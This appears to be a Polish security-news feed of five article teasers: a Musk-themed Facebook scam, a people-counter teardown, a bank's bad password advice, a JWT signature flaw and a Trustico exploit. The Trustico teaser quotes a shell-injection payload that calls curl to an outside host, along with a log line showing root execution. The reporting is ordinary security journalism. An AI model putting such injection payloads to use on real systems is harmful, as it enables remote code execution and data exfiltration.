Na naszą skrzynkę sekurak@sekurak.pl otrzymaliśmy od Was ciekawy przykład kampanii scamowej, która jest wzorcowym przykładem jak można ją “zepsuć” na każdym etapie. 11 września został utworzony profil firmy “App Blog” na portalu Facebook jako rzekomy profil związany z Elonem Muskiem, który „otworzył swoją działalność w Polsce i zachęca do zarabiania…
Czytaj dalej »
Producent tego urządzenia (Footfallcam) reklamuje się jako: World’s No.1 People Counting System (…) Best Selling People Counter in 2019 Ale zostawmy marketing na boku i przejdźmy do tego co lubimy najbardziej – tutaj ciekawy wątek (w zasadzie cały artykuł :) w formie powiązanych tweetów: Otóż badacz rozbebeszył urządzenie… ale jeszcze…
Czytaj dalej »
Chodzi o włoski FinecoBank – podają oni kilka zasad tworzenia dobrego hasła. I na koniec tych rad prawdziwa torpeda: inseriscila su google se ti restituce meno di 10 risultati significa che e una buona password w wolnym tłumaczeniu: a teraz drogie misie wygooglujcie swoje hasło żeby sprawdzić czy jest OK w…
Czytaj dalej »
Jeśli ktoś zna tematykę JWT (JSON Web Token), to wie że aby uniemożliwić postronnym osobom modyfikacje zawartości tokena (payload), używany jest podpis. Bez weryfikacji podpisu każdy mógłby wygenerować dowolny token i serwer go zaakceptuje. Czyli np. dostajemy bezproblemowo dostęp do funkcji administracyjnych czy innych ciekawych danych. Zobaczmy więc na podatność CVE-2019-7644:…
Czytaj dalej »
Chodzi o Trustico, który dostarczał certyfikaty SSL m.in. „pechowemu” Equifax. Jak wyglądał exploit dający roota? Banalnie – w miejscu gdzie sprawdzaliśmy domenę wystarczyło wpisać: $(curl https://domain/`id`) Efekt? Porażający, bo poza wykonaniem kodu, widać że wykonuje się on jako root: 35.190.140.214 – [01/Mar/2018:09:52:14 -0500] „GET /uid=0(root) HTTP/1.1” 404 209 „-” „curl/7.29.0”…
Czytaj dalej »